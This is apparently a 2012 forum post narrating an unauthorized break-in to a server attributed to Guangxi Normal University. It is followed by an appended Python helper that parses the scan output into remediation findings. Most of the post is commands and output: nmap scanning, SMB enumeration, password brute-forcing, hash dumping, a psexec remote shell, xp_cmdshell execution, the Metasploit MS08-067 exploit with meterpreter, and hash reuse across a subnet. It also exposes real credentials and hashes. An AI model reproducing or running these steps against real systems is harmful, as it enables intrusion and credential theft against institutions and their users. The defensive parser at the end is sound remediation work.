Breaking into Guangxi Normal University with nmap + msf
Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // in msf, use the ms08-067 vulnerability to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
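Added here as a defender-side helper, not part of the original post: this Python parses the nmap "Host script results" blocks shown above (smb-brute, smb-enum-shares, smb-pwdump, smb-check-vulns) into remediation findings. The sample input and the issue labels are constructed; the check on the trailing `AAD3B435B51404EE` half relies on that being the LM hash of an empty 7-byte block, so its presence means LM hashing is enabled and the password is 7 characters or fewer.

```python
import re

# Constructed sample: the "Host script results" lines from the scans above, concatenated (test data).
SAMPLE = """\
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# LM hash of an empty 7-byte half: as the second half of a stored LM hash it
# means LM hashing is enabled and the password is at most 7 characters long.
EMPTY_LM_HALF = "AAD3B435B51404EE"


def parse_host_scripts(text):
    """Split the '|'-prefixed host-script output into {script name: body text}."""
    scripts, current = {}, None
    for raw in text.splitlines():
        line = re.sub(r"^\|_?\s*", "", raw).strip()
        if line.startswith("smb-") and line.endswith(":"):
            current = line[:-1]
            scripts[current] = []
        elif current:
            scripts[current].append(line)
    return {name: "\n".join(body) for name, body in scripts.items()}


def findings(text):
    """Return (subject, issue, remediation) tuples for the weaknesses reported."""
    s, out = parse_host_scripts(text), []
    for user, guess in re.findall(r"(\S+):(\S+) => Login was successful", s.get("smb-brute", "")):
        issue = "blank-password" if guess == "<blank>" else "weak-password"
        out.append((user, issue, f"logon succeeded with {guess}; set a strong password, review admin rights"))
    for share, level in re.findall(r"(\S+)\nAnonymous access: (\S+)", s.get("smb-enum-shares", "")):
        if level != "<none>":
            out.append((share, "anonymous-share", f"null session gets {level}; restrict anonymous access"))
    for user, lm in re.findall(r"(\S+):\d+ => ([^:\n]+):", s.get("smb-pwdump", "")):
        if lm.startswith("NO PASSWORD"):
            out.append((user, "empty-hash", "account has no password; set one or disable the account"))
        elif lm.upper().endswith(EMPTY_LM_HALF):
            out.append((user, "lm-hash-short", "LM hash stored, password <= 7 chars; enable NoLMHash and lengthen"))
        else:
            out.append((user, "lm-hash", "LM hash stored; enable NoLMHash and reset the password"))
    for name, state in re.findall(r"(\S+): (\S+)", s.get("smb-check-vulns", "")):
        if state == "VULNERABLE":
            out.append((name, "unpatched", f"apply the {name} security update"))
    return out
```

Run `findings(SAMPLE)` to get the seven findings for the sample; feeding it the host-script section of a real `nmap -oN` report works the same way.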